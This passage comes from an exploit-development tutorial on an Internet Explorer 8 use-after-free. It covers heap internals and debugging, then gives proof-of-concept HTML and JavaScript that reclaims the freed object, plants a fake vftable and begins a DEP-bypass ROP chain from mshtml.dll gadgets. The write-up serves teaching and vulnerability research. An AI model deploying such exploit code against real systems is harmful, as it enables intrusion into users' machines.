  // Creating a use-after-free situation. Accessing a member of the class object c1, after it has been freed
  c1->sharedFunction();
}

Rebuild the solution. After rebuilding, let’s set WinDbg to be our postmortem debugger. Open up a cmd.exe session, as an administrator, and change the current working directory to the installation of WinDbg. Then, enter windbg.exe -I.

This command configured WinDbg to automatically attach and analyze a program that has just crashed. The above addition of code should cause our program to crash.

Additionally, before moving on, we are going to turn on a feature of the Windows SDK known as gflags.exe. glfags.exe, when leveraging its PageHeap functionality, provides extremely verbose debugging information about the heap. To do this, in the same directory as WinDbg, enter the following command to enable PageHeap for our process gflags.exe /p /enable C:\Path\To\Your\virtualfunctions.exe. You can read more about PageHeap here and here. Essentially, since we are dealing with memory that is not valid, PageHeap will aid us in still making sense of things, by specifying “patterns” on heap allocations. E.g. if a page is free, it may fill it with a pattern to let you know it is free, rather than just showing ??? in WinDbg, or just crashing.

Run the .exe again, after adding the code, and WinDbg should fire up.

After enabling PageHeap, let’s run the vulnerable code. (Note you may need to right click the below image and open it in a new tab)

Very interesting, we can see a crash has occurred! Notice the call qword ptr [rax] instruction we landed on, as well. First off, this is a result of PageHeap being enabled, meaning we can see exactly where the crash occurred, versus just seeing a standard access violation. Recall where you have seen this? This looks to be an attempted function call to a virtual function that does not exist! This is because the class object was allocated on the heap. Then, when delete is called to free the object and the destructor is invoked, it destroys the class object. That is what happened in this case - the class object we are trying to call a virtual function from has already been freed, so we are calling memory that isn’t valid.

What if we were able to allocate some heap memory in place of the object that was freed? Could we potentially control program execution? That is going to be our goal, and will hopefully result in us being able to get stack control and obtain a shell later. Lastly, let’s take a few moments to familiarize ourself with the Windows heap, before moving on to the exploitation path.

The Windows Heap Manager - The Low Fragmentation Heap (LFH), Back-End Allocator, and Default Heaps

tl;dr -The best explanation of the LFH, and just heap management in general on Windows, can be found at this link. Chris Valasek’s paper on the LFH is the de facto standard on understanding how the LFH works and how it coincides with the back-end manager, and much, if not all, of the information provided here, comes from there. Please note that the heap has gone through several minor and major changes since Windows 7, and it should be considered techniques leveraging the heap internals here may not be directly applicable to Windows 10, or even Windows 8.

It should be noted that heap allocations start out technically by querying the front-end manager, but since the LFH, which is the front-end manager on Windows, is not always enabled - the back-end manager ends up being what services requests at first.

A Windows heap is managed by a structure known as HeapBase, or ntdll!_HEAP. This structure contains many members to get/provide applicable information about the heap.

The ntdll!_HEAP structure contains a member called BlocksIndex. This member is of type _HEAP_LIST_LOOKUP, which is a linked-list structure. (You can get a list of active heaps with the !heap command, and pass the address as an argument to dt ntdll_HEAP). This structure is used to hold important information to manage free chunks, but does much more.

Next, here is what the HeapBase->BlocksIndex (_HEAP_LIST_LOOKUP)structure looks like.

The first member of this structure is a pointer to the next _HEAP_LIST_LOOKUP structure in line, if there is one. There is also an ArraySize member, which defines up to what size chunks this structure will track. On Windows 7, there are only two sizes supported, meaning this member is either 0x80, meaning the structure will track chunks up to 1024 bytes, or 0x800, which means the structure will track up to 16KB. This also means that for each heap, on Windows 7, there are technically only two of these structures - one to support the 0x80 ArraySize and one to support the 0x800 ArraySize.

HeapBase->BlocksIndex, which is of type _HEAP_LIST_LOOKUP, also contains a member called ListHints, which is a pointer into the FreeLists structure, which is a linked-list of pointers to free chunks available to service requests. The index into ListHints is actually based on the BaseIndex member, which builds off of the size provided by ArraySize. Take a look at the image below, which instruments another _HEAP_LIST_LOOKUP structure, based on the ExtendedLookup member of the first structure provided by ntdll!_HEAP.

For example, if ArraySize is set to 0x80, as is seen in the first structure, the BaseIndex member is 0, because it manages chunks 0x0 - 0x80 in size, which is the smallest size possible. Since this screenshot is from Windows 10, we aren’t limited to 0x80 and 0x800, and the next size is actually 0x400. Since this is the second smallest size, the BaseIndex member is increased to 0x80, as now chunks sizes 0x80 - 0x400 are being addressed. This BaseIndex value is then used, in conjunction with the target allocation size, to index ListHints to obtain a chunk for servicing an allocation. This is how ListHints, a linked-list, is indexed to find an appropriately sized free chunk for usage via the back-end manager.

What is interesting to us is that the BLINK (back link) of this structure, ListHints, when the front-end manager is not enabled, is actually a pointer to a counter. Since ListHints will be indexed based on a certain chunk size being requested, this counter is used to keep track of allocation requests to that certain size. If 18 consecutive allocations are made to the same chunk size, this enables the LFH.

To be brief about the LFH - the LFH is used to service requests that meet the above heuristics requirements, which is 18 consecutive allocations to the same size. Other than that, the back-end allocator is most likely going to be called to try to service requests. Triggering the LFH in some instances is useful, but for the purposes of our exploit, we will not need to trigger the LFH, as it will already be enabled for our heap. Once the LFH is enabled, it stays on by default. This is useful for us, as now we can just create objects to replace the freed memory. Why? The LFH is also LIFO on Windows 7, like the stack. The last deallocated chunk is the first allocated chunk in the next request. This will prove useful later on. Note that this is no longer the case on more updated systems, and the heap has a greater deal of randomization.

In any event, it is still worth talking about the LFH in its entierty, and especially the heap on Windows. The LFH essentially optimizes the way heap memory is distributed, to avoid breaking, or fragmenting memory into non-contiguous blocks, so that almost all requests for heap memory can be serviced. Note that the LFH can only address allocations up to 16KB. For now, this is what we need to know as to how heap allocations are serviced.

Now that we have talked about the different heap manager, let’s talk about usage on Windows.

Processes on Windows have at least one heap, known as the default process heap. For most applications, especially those smaller in size, this is more than enough to provide the applicable memory requirements for the process to function. By default it is 1 MB, but applications can extend their default heaps to bigger sizes. However, for more memory intensive applications, additional algorithms are in play, such as the front-end manager. The LFH is the front-end manager on Windows, starting with Windows 7.

In addition to the aforesaid heaps/heap managers, there is also a segment heap, which was added with Windows 10. This can be read about here.

Please note that this explanation of the heap can be more integrally explained by Chris’ paper, and the above explanations are not a comprehensive list, are targeted more towards Windows 7, and are listed simply for brevity and because they are applicable to this exploit.

The Vulnerability And Exploitation Strategy

Now that we have talked about C++ and heap behaviors on Windows, let’s dive into the vulnerability itself. The full exploit script is available on the Exploit-DB, by way of the Metasploit team, and if you are confused by the combination of Ruby and HTML/JavaScript, I have gone ahead and stripped down the code to “the trigger code”, which causes a crash.

Going back over the vulnerability, and reading the description, this vulnerability arises when a CPhraseElement comes after a CTableRow element, with the final node being a sub-table element. This may seem confusing and illogical at first, and that is because it is. Don’t worry so much about the order of the code first, as to the actual root cause, which is that when a CPhraseElement’s outerText property is reset (freed). However, after this object has been freed, a reference still remains to it within the C++ code. This reference is then passed down to a function that will eventually try to fetch a virtual function for the object. However, as we saw previously, accessing a virtual function for a freed object will result in a crash - and this is what is happening here. Additionally, this vulnerability was published at HitCon 2013. You can view the slides here, which contains a similar proof of concept above. Note that although the elements described are not the same name as the elements in the HTML, note that when something like CPhraseElement is named, it refers to the C++ class that manages a certain object. So for now, just focus on the fact we have a JavaScript function that essentially creates an element, and then sets the outerText property to NULL, which essentially will perform a “free”.

So, let’s get into the crash. Before starting, note that this is all being done on a Windows 7 x86 machine, Service Pack 0. Additionally, the browser we are focusing on here is Internet Explorer 8. In the event the Windows 7 x86 machine you are working on has Internet Explorer 11 installed, please make sure you uninstall it so browsing defaults to Internet Explorer 8. A simple Google search will aid you in removing IE11. Additionally, you will need WinDbg to debug. Please use the Windows SDK version 8 for this exploit, as we are on Windows 7. It can be found here.

After saving the code as an .html file, opening it in Internet Explorer reveals a crash, as is expected.

Now that we know our POC will crash the browser, let’s set WinDbg to be our postmortem debugger, identically how we did earlier, to identify if we can’t see why this crash ensued.

Running the POC again, we can see that our crash registered in WinDbg, but it seems to be nonsensical.

We know, according the advisory, this is a use-after-free condition. We also know it is the result of fetching a virtual function from an object that no longer exists. Knowing this, we should expect to see some memory being dereferenced that no longer exists. This doesn’t appear to be the case, however, and we just see a reference to invalid memory. Recall earlier when we turned on PageHeap! We need to do the same thing here, and enable PageHeap for Internet Explorer. Leverage the same command from earlier, but this time specify iexplore.exe.

After enabling PageHeap, let’s rerun the POC.

Interesting! The instruction we are crashing on is from the class CElement. Notice the instruction the crash occurs on is mov reg, dword ptr[eax+70h]. If we unsassembly the current instruction pointer, we can see something that is very reminiscent of our assembly instructions we showed earlier to fetch a virtual function.

Recall last time, on our 64-bit system, the process was to fetch the vptr, or pointer to the virtual function table, and then to call what this pointer points to, at a specific offset. Dereferencing the vptr, at an offset of 0x8, for instance, would take the virtual function table and then take the second entry (entry 1 is 0x0, entry 2 is 0x8, entry 3 would be 0x18, entry 4 would be 0x18, and so on) and call it.

However, this methodology can look different, depending on if you are on a 32-bit system or a 64-bit system, and compiler optimization can change this as well, but the overarching concept remains. Let’s now take a look at the above image.

What is happening here is the a fetching of the vptr via [ecx]. The vptr is loaded into ECX and then is dereferenced, storing the pointer into EAX. The EAX register, which now contains the pointer to the virtual function table, is then going to take the pointer, go 0x70 bytes in, and dereference the address, which would be one of the virtual functions (which ever function is stored at virtual_function_table + 0x70)! The virtual function is placed into EDX, and then EDX is called.

Notice how we are getting the same result as our simple program earlier, although the assembly instructions are just slightly different? Looking for these types of routines are very indicative of a virtual function being fetched!

Before moving on, let’s recall a former image.

Notice the state of EAX whenever the function crashes (right under the Access Violation statement). It seems to have a pattern of sorts f0f0f0f0. This is the gflags.exe pattern for “a freed allocation”, meaning the value in EAX is in a free state. This makes sense, as we are trying to index an object that simply no longer exists!

Rerun the POC, and when the crash occurs let’s execute the following !heap command: !heap -p -a ecx.

Why ECX? As we know, the first thing the routine for fetching a virtual function does is load the vptr into EAX, from ECX. Since this is a pointer to the table, which was allocated by the heap, this is technically a pointer to the heap chunk. Even though the memory is in a free state, it is still pointed to by the value [ecx] in this case, which is the vptr. It is only until we dereference the memory can we see this chunk is actually invalid.

Moving on, take a look at the call stack we can see the function calls that led up to the chunk being freed. In the !heap command, -p is to use a PageHeap option, and -a is to dump the entire chunk. On Windows, when you invoke something such as a C Runtime function like free, it will eventually hand off execution to a Windows API. Knowing this, we know that the “lowest level” (e.g. last) function call within a module to anything that resembles the word “free” or “destructor” is responsible for the freeing. For instance, if we have an .exe named vuln.exe, and vuln.exe calls free from the MSVCRT library (the Microsoft C Runtime library), it will actually eventually hand off execution to KERNELBASE!HeapFree, or kernel32!HeapFree, depending on what system you are on. The goal now is to identify such behavior, and to determine what class actually is handling the free that is responsible for freeing the object (note this doesn’t necessarily mean this is the “vulnerable piece of code”, it just means this is where the free occurs).

Note that when analyzing call stacks in WinDbg, which is simply a list of function calls that have resulted to where execution currently resides, the bottom function is where the start is, and the top is where execution currently is/ended up. Analyzing the call stack, we can see that the last call before kernel32 or ntdll is hit, is from the mshtml library, and from the CAnchorElement class. From this class, we can see the destructor is what kicks off the freeing. This is why the vulnerability contains the words CAnchorElement Use-After-Free!

Awesome, we know what is causing the object to be freed! Per our earlier conversation surrounding our overarching exploitation strategy, we could like to try and fill the invalid memory with some memory we control! However, we also talked about the heap on Windows, and how different structures are responsible for determining which heap chunk is used to service an allocation. This heavily depends on the size of the allocation.

In order for us to try and fill up the freed chunk with our own data, we first need to determine what the size of the object being freed is, that way when we allocate our memory, it will hopefully be used to fill the freed memory slot, since we are giving the browser an allocation request of the exact same size as a chunk that is currently freed (recall how the heap tries to leverage existing freed chunks on the back-end before invoking the front-end).

Let’s step into IDA for a moment to try to reverse engineer exactly how big this chunk is, so that way we can fill this freed chunk with out own data.

We know that the freeing mechanism is the destructor for the CAnchorElement class. Let’s search for that in IDA. To do this, download IDA Freeware for Windows on a second Windows machine that is 64-bit, and preferably Windows 10. Then, take mshtml.dll, which is found in C:\Windows\system32 on the Windows 7 exploit development machine, copy it over to the Windows machine with IDA on it, and load it. Note that there may be issues with getting the proper symbols in IDA, since this is an older DLL from Windows 7. If that is the case, I suggest looking at PDB Downloader to quickly obtain the symbols locally, and import the .pdb files manually.

Now, let’s search for the destructor. We can simply search for the class CAnchorElement and look for any functions that contain the word destructor.

As we can see, we found the destructor! According to the previous stack trace, this destructor should make a call to HeapFree, which actually does the freeing. We can see that this is the case after disassembling the function in IDA.

Querying the Microsoft documentation for HeapFree, we can see it takes three arguments: 1. A handle to the heap where the chunk of memory will be freed, 2. Flags for freeing, and 3. A pointer to the actual chunk of memory to be freed.

At this point you may be wondering, “none of those parameters are the size”. That is correct! However, we now see that the address of the chunk that is going to be freed will be the third parameter passed to the HeapFree call. Note that since we are on a 32-bit system, functions arguments will be passed through the __stdcall calling convention, meaning the stack is used to pass the arguments to a function call.

Take one more look at the prototype of the previous image. Notice the destructor accepts an argument for an object of type CAnchorElement. This makes sense, as this is the destructor for an object instantiated from the CAnchorElement class. This also means, however, there must be a constructor that is capable of creating said object as well! And as the destructor invokes HeapFree, the constructor will most likely either invoke malloc or HeapAlloc! We know that the last argument for the HeapFree call in the destructor is the address of the actual chunk to be freed. This means that a chunk needs to be allocated in the first place. Searching again through the functions in IDA, there is a function located within the CAnchorElement class called CreateElement, which is very indicative of a CAnchorElement object constructor! Let’s take a look at this in IDA.

Great, we see that there is in fact a call to HeapAlloc. Let’s refer to the Microsoft documentation for this function.

The first parameter is again, a handle to an existing heap. The second, are any flags you would like to set on the heap allocation. The third, and most importantly for us, is the actual size of the heap. This tells us that when a CAnchorElement object is created, it will be 0x68 bytes in size. If we open up our POC again in Internet Explorer, letting the postmortem debugger taking over again, we can actually see the size of the free from the vulnerability is for a heap chunk that is 0x68 bytes in size, just as our reverse engineering of the CAnchorElement::CreateElement function showed!

#

This proves our hypothesis, and now we can start editing our script to see if we can’t control this allocation. Before proceeding, let’s disable PageHeap for IE8 now.

Now with that done, let’s update our POC with the following code.

The above POC starts out again with the trigger, to create the use-after-free condition. After the use-after-free is triggered, we are creating a string that has 104 bytes, which is 0x68 bytes - the size of the freed allocation. This by itself doesn’t result in any memory being allocated on the heap. However, as Corelan points out, it is possible to create an arbitrary DOM element and set one of the properties to the string. This action will actually result in the size of the string, when set to a property of a DOM element, being allocated on the heap!

Let’s run the new POC and see what result we get, leveraging WinDbg once again as a postmortem debugger.

Interesting! This time we are attempting to dereference the address 0x41414141, instead of getting an arbitrary crash like we did at the beginning of this blog, by triggering the original POC without PageHeap enabled! The reason for this crash, however, is much different! Recall that the heap chunk causing the issue is in ECX, just like we have previously seen. However, this time, instead of seeing freed memory, we can actually see our user-controlled data now allocates the heap chunk!

Now that we have finally figured out how we can control the data in the previously freed chunk, we can bring everything in this tutorial full circle. Let’s look at the current program execution.

We know that this is a routine to fetch a virtual function from a virtual function table. The first instruction, mov eax, dword ptr [ecx] takes the virtual function table pointer, also known as the vptr, and loads it into the EAX register. Then, from there, this vptr is dereferenced again, which points to the virtual function table, and is called at a specified offset. Notice how currently we control the ECX register, which is used to hold the vptr.

Let’s also take a look at this chunk in context of a HeapBase structure.

As we can see, in the heap our chunk is a part of, the LFH is activated (FrontEndHeapType of 0x2 means the LFH is in use). As mentioned earlier, this will allow us to easily fill in the freed memory with our own data, as we have just seen in the images above. Remember that the LFH is also LIFO, like the stack, on Windows 7. The last deallocated chunk is the first allocated chunk in the next request. This has proven useful, as we were able to find out the correct size for this allocation and service it.

This means that we own the 4 bytes that was previously used to hold the vptr. Let’s think now - what if it were possible to construct our own fake virtual function table, with 0x70 entries? What we could do is, with our primitive to control the vptr, we could replace the vptr with a pointer to our own “virtual function table”, which we could allocate somewhere in memory. From there, we could create 70 pointers (think of this as 70 “fake functions”) and then have the vptr we control point to the virtual function table.

By program design, the program execution would naturally dereference our fake virtual function table, it would fetch whatever is at our fake virtual function table at an offset of 0x70, and it would invoke it! The goal from here is to construct our own vftable and to make the 70th “function” in our table a pointer to a ROP chain that we have constructed in memory, which will then bypass DEP and give us a shell!

We know now that we can fill our freed allocation with our own data. Instead of just using DOM elements, we will actually be using a technique to perform precise reallocation with HTML+TIME, as described by Exodus Intelligence. I opted for this method to just simply avoid heap spraying, which is not the focus of this post. The focus here is to understand use-after-free vulnerabilities and understand JavaScript’s behavior. Note that on more modern systems, where a primitive such as this doesn’t exist anymore, this is what makes use-after-frees more difficult to exploit, the reallocation and reclaiming of freed memory. It may require additional reverse engineering to find objects that are a suitable size, etc.

Essentially what this HTML+TIME “method”, which only works for IE8, does is instead of just placing 0x68 bytes of memory to fill up our heap, which still results in a crash because we are not supplying pointers to anything, just raw data, we can actually create an array of 0x68 pointers that we control. This way, we can force the program execution to actually call something meaningful (like our fake virtual table!).

Take a look at our updated POC. (You may need to open the first image in a new tab)

Again, the Exodus blog will go into detail, but what essentially is happening here is we are able to leverage SMIL (Synchronized Multimedia Integration Language) to, instead of just creating 0x68 bytes of data to fill the heap, create 0x68 bytes worth of pointers, which is much more useful and will allow us to construct a fake virtual function table.

Note that heap spraying is something that is an alternative, although it is relatively scrutinized. The point of this exploit is to document use-after-free vulnerabilities and how to determine the size of a freed allocation and how to properly fill it. This specific technique is not applicable today, as well. However, this is the beginning of myself learning browser exploitation, and I would expect myself to start with the basics.

Let’s now run the POC again and see what happens.

Great news, we control the instruction pointer! Let’s examine how we got here. Recall that we are executing code within the same routine in CElement::Doc we have been, where we are fetching a virtual function from a vftable. Take a look at the image below.

Let’s start with the top. As we can see, EIP is now set to our user-controlled data. The value in ECX, as has been true throughout this routine, contains the address of the heap chunk that has been the culprit of the vulnerability. We have now controlled this freed chunk with our user-supplied 0x68 byte chunk.

As we know, this heap chunk in ECX, when dereferenced, contains the vptr, or in our case, the fake vptr. Notice how the first value in ECX, and every value after, is 004.... These are the array of pointers the HTML+TIME method returned! If we dereference the first member, it is a pointer to our fake vftable! This is great, as the value in ECX is dereferenced to fetch our fake vptr (one of the pointers from the HTML+TIME method). This then points to our fake virtual function table, and we have set the 70th member to 42424242 to prove control over the instruction pointer. Just to reiterate one more time, remember, the assembly for fetching a virtual function is as follows:

mov eax, dword ptr [ecx]   ; This gets the vptr into EAX, from the value pointed to by ECX
mov edx, dword ptr [eax+0x70]  ; This takes the vptr, dereferences it to obtain a pointer to the virtual function table at an offset of 0x70, and stores it in EDX
call edx       ; The function is called

So what happened here is that we loaded our heap chunk, that replaced the freed chunk, into ECX. The value in ECX points to our heap chunk. Our heap chunk is 0x68 bytes and consists of nothing but pointers to either the fake virtual function table (the 1st pointer) or a pointer to the string vftable(the 2nd pointer and so on). This can be seen in the image below (In WinDbg poi() will dereference what is within parentheses and display it).

This value in ECX, which is a pointer to our fake vtable, is also placed in EAX.

The value in EAX, at an offset of 0x70 is then placed into the EDX register. This value is then called.

As we can see, this is 42424242, which is the target function from our fake vftable! We have now successfully created our exploit primitive, and we can begin with a ROP chain, where we can exchange the EAX and ESP registers, since we control EAX, to obtain stack control and create a ROP chain.

I Mean, Come On, Did You Expect Me To Skip A Chance To Write My Own ROP Chain?

First off, before we start, it is well known IE8 contains some modules that do not depend on ASLR. For these purposes, this exploit will not take into consideration ASLR, but I hope that true ASLR bypasses through information leaks are something that I can take advantage of in the future, and I would love to document those findings in a blog post. However, for now, we must learn to walk before we can run. At the current state, I am just learning about browser exploitation, and I am not there yet. However, I hope to be soon!

It is a well known fact that, while leveraging the Java Runtime Environment, version 1.6 to be specific, an older version of MSVCR71.dll gets loaded into Internet Explorer 8, which is not compiled with ASLR. We could just leverage this DLL for our purposes. However, since there is already much documentation on this, we will go ahead and just disable ASLR system wide and constructing our own ROP chain, to bypass DEP, with another library that doesn’t have an “automated ROP chain”. Note again, this is the first post in a series where I hope to increasingly make things more modern. However, I am in my infancy in regards to learning browser exploitation, so we are going to start off by walking instead of running. This article describes how you can disable ASLR system wide.

Great. From here, we can leverage the rp++ utility to enumerate ROP gadgets for a given DLL. Let’s search in mshtml.dll, as we are already familiar with it!

To start, we know that our fake virtual function table is in EAX. We are not limited to a certain size here, as this table is pointed to by the first of 26 DWORDS (for a total of 0x68, or 104 bytes) that fills up the freed heap chunk. Because of this, we can exchange the EAX register (which we control) with the ESP register. This will give us stack control and allow us to start forging a ROP chain.

Parsing the ROP gadget output from rp++, we can see a nice ROP gadget exists

Let’s set update our POC with this ROP gadget, in place of the former 42424242 DWORD that is in place of our fake virtual function.

<!DOCTYPE html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<meta><?IMPORT namespace="t" implementation="#default#time2"></meta>
  <script>

    window.onload = function() {

      // Create the fake vftable of 70 DWORDS (70 "functions")
      vftable = "\u4141\u4141";

      for (i=0; i < 0x70/4; i++)
      {
        // This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
        // which is now controlled by our own chunk
        if (i == 0x70/4-1)
        {
          vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
        }
        else
        {
          vftable+= unescape("\u4141\u4141");
        }
      }

      // This creates an array of strings that get pointers created to them by the values property of t:ANIMATECOLOR (so technically these will become an array of pointers to strings)
      // Just make sure that the strings are semicolon separated (the first element, which is our fake vftable, doesn't need to be prepended with a semicolon)
      // The first pointer in this array of pointers is a pointer to the fake vftable, constructed with the above for loops. Each ";vftable" string is prepended to the longer 0x70 byte fake vftable, which is the first pointer/DWORD
      for(i=0; i<25; i++)
      {
        vftable += ";vftable";
      }

      // Trigger the UAF
      var x  = document.getElementById("a");
      x.outerText = "";

      /*
      // Create a string that will eventually have 104 non-unicode bytes
      var fillAlloc = "\u4141\u4141";

      // Strings in JavaScript are in unicode
      // \u unescapes characters to make them non-unicode
      // Each string is also appended with a NULL byte
      // We already have 4 bytes from the fillAlloc definition. Appending 100 more bytes, 1 DWORD (4 bytes) at a time, compensating for the last NULL byte
      for (i=0; i < 100/4-1; i++)
      {
        fillAlloc += "\u4242\u4242";
      }

      // Create an array and add it as an element
      // https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/
      // DOM elements can be created with a property set to the payload
      var newElement = document.createElement('img');
      newElement.title = fillAlloc;
      */

      try {
        a = document.getElementById('anim');
        a.values = vftable;
      }
      catch (e) {};

  </script>
    <table>
      <tr>
        <div>
          <span>
            <q id='a'>
              <a>
                <td></td>
              </a>
            </q>
          </span>
        </div>
      </tr>
    </table>
ss
</html>

Let’s (for now) leave WinDbg configured as our postmortem debugger, and see what happens. Running the POC, we can see that the crash ensues, and the instruction pointer is pointing to 41414141.

Great! We can see that we have gained control over EAX by making our virtual function point to a ROP gadget that exchanges EAX into ESP! Recall earlier what was said about our fake vftable. Right now, this table is only 0x70 bytes in size, because we know our vftable from earlier indexed a function from offset 0x70. This doesn’t mean, however, we are limited to 0x70 total bytes. The only limitation we have is how much memory we can allocate to fill the chunk. Remember, this vftable is pointed to by a DWORD, created from the HTML+TIME method to allocate 26 total DWORDS, for a total of 0x68 bytes, or 104 bytes in decimal, which is what we need in order to control the freed allocation.

Knowing this, let’s add some “ROP” gadgets into our POC to outline this concept.

// Create the fake vftable of 70 DWORDS (70 "functions")
vftable = "\u4141\u4141";

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else
{
  vftable+= unescape("\u4141\u4141");
}
}

// Begin the ROP chain
rop = "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

Great! We can see that our crash still occurs properly, the instruction pointer is controlled, and we have added to our fake vftable, which is now located on the stack! In terms of exploitation strategy, notice there still remains a pointer on the stack that is our original xchg eax, esp instruction. Because of this, we will need to actually start our ROP chain after this pointer, since it already has been executed. This means that our ROP gadget should start where the 43434343 bytes begin, and the 41414141 bytes can remain as padding/a jump further into the fake vftable.

It should be noted that from here on out, I had issues with setting breakpoints in WinDbg with Internet Explorer processes. This is because Internet Explorer forks many processes, depending on how many tabs you have, and our code, even when opened in the original Internet Explorer tab, will fork another Internet Explorer process. Because of this, we will just continue to use WinDbg as our postmortem debugger for the time being, and making changes to our ROP chain, then viewing the state of the debugger to see our results. When necessary, we will start debugging the parent process of Internet Explorer and then WinDbg to identify the correct child process and then debug it in order to properly analyze our exploit.

We know that we need to change the rest of our fake vftable DWORDS with something that will eventually “jump” over our previously used xchg eax, esp ; ret gadget. To do this, let’s edit how we are constructing our fake vftable.

// Create the fake vftable of 70 DWORDS (70 "functions")
// Start the table with ROP gadget that increases ESP (Since this fake vftable is now on the stack, we need to jump over the first 70 "functions" to hit our ROP chain)
// Otherwise, the old xchg eax, esp ; ret stack pivot gadget will get re-executed
vftable = "\u07be\u74fb";                   // add esp, 0xC ; ret (74fb07be) (mshtml.dll)

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else if (i == 0x68/4-1)
{
  vftable += unescape("\u07be\u74fb");    // add esp, 0xC ; ret (74fb07be) (mshtml.dll) When execution reaches here, jump over the xchg eax, esp ; ret gadget and into the full ROP chain
}
else
{
  vftable+= unescape("\u7738\u7503");     // ret (75037738) (mshtml.dll) Keep perform returns to increment the stack, until the final add esp, 0xC ; ret is hit
}
}

// ROP chain
rop = "\u9090\u9090";             // Padding for the previous ROP gadget (add esp, 0xC ; ret)

// Our ROP chain begins here
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

What we know so far, is that this fake vftable will be loaded on the stack. When this happens, our original xchg eax, esp ; ret gadget will still be there, and we will need a way to make sure we don’t execute it again. The way we are going to do this is to replace our 41414141 bytes with several ret opcodes that will lead to an eventual add esp, 0xC ; ret ROP gadget, which will jump over the xchg eax, esp ; ret gadget and into our final ROP chain!

Rerunning the new POC shows us program execution has skipped over the virtual function table and into our ROP chain! I will go into detail about the ROP chain, but from here on out there is nothing special about this exploit. Just as previous blogs of mine have outlined, constructing a ROP chain is simply the same at this point. For getting started with ROP, please refer to these posts. This post will just walk through the ROP chain constructed for this exploit.

The first of the 8 43434343 DWORDS is in ESP, with the other 7 DWORDS located on the stack.

This is great news. From here, we just have a simple task of developing a 32-bit ROP chain! The first step is to get a stack address loaded into a register, so we can use it for RVA calculations. Note that although the stack changes addresses between each instance of a process (usually), this is not a result of ASLR, this is just a result of memory management.

Looking through mshtml.dll we can see there is are two great candidates to get a stack address into EAX and ECX.

pop esp ; pop eax ; ret

mov ecx, eax ; call edx

Notice, however, the mov ecx, eax instruction ends in a call. We will first pop a gadget that “returns to the stack” into EDX. When the call occurs, our stack will get a return address pushed onto the stack. To compensate for this, and so program execution doesn’t execute this return address, we simply can add to ESP to essentially “jump over” the return address. Here is what this block of ROP chains look like.

// Our ROP chain begins here
rop += "\ud937\u74e7";                     // push esp ; pop eax ; ret (74e7d937) (mshtml.dll) Get a stack address into a controllable register
rop += "\u9d55\u74c2";                     // pop edx ; ret (74c29d55) (mshtml.dll) Prepare EDX for COP gadget
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX, which contains a stack address, into ECX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9365\u750c";                     // add esp, 0x18 ; pop ebp ; ret (750c9365) (mshtml.dll) Jump over parameter placeholders into ROP chain

// Parameter placeholders
// The Import Address Table of mshtml.dll has a direct pointer to VirtualProtect 
// 74c21308  77e250ab kernel32!VirtualProtectStub
rop += "\u1308\u74c2";                     // kernel32!VirtualProtectStub IAT pointer
rop += "\u1111\u1111";                     // Fake return address placeholder
rop += "\u2222\u2222";                     // lpAddress (Shellcode address)
rop += "\u3333\u3333";                     // dwSize (Size of shellcode)
rop += "\u4444\u4444";                     // flNewProtect (PAGE_EXECUTE_READWRITE, 0x40)
rop += "\u5555\u5555";                     // lpflOldProtect (Any writable page)

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\u9090\u9090";                     // Compensate for pop ebp instruction from gadget that "jumps" over parameter placeholders
rop += "\u9090\u9090";                     // Start ROP chain

After we get a stack address loaded into EAX and ECX, notice how we have constructed “parameter placeholders” for our call to eventually VirtualProtect, which will mark the stack as RWX, and we can execute our shellcode from there.

Recall that we have control of the stack, and everything within the rop variable is on the stack. We have the function call on the stack, because we are performing this exploit on a 32-bit system. 32-bit systems, as you can recall, leverage the __stdcall calling convention on Windows, by default, which passes function arguments on the stack. For more information on how this ROP method is constructed, you can refer to a previous blog I wrote, which outlines this method.

After running the updated POC, we can see that we land on the 90909090 bytes, which is in the above POC marked as “Start ROP chain”, which is the last line of code. Let’s check a few things out to confirm we are getting expected behavior.

Our ROP chain starts out by saving ESP (at the time) into EAX. This value is then moved into ECX, meaning EAX and ECX both contain addresses that are very close to the stack in its current state. Let’s check the state of the registers, compared to the value of the stack.

As we can see, EAX and ECX contain the same address, and both of these addresses are part of the address space of the current stack! This is great, and we are now on our way. Our goal now will be to leverage the preserved stack addresses, place them in strategic registers, and leverage arbitrary write gadgets to overwrite the stack addresses containing the placeholders with our actual arguments.

As mentioned above, we know that Internet Explorer, when spawned, creates at least two processes. Since our exploit additionally forks another process from Internet Explorer, we are going to work backwards now. Let’s leverage Process Hacker in order to see the process tree when Internet Explorer is spawned.

The processes we have been looking at thus far are the child processes of the original Internet Explorer parent. Notice however, when we run our POC (which is not a complete exploit and still causes a crash), that a third Internet Explorer process is created, even though we are opening this file from the second Internet Explorer process.

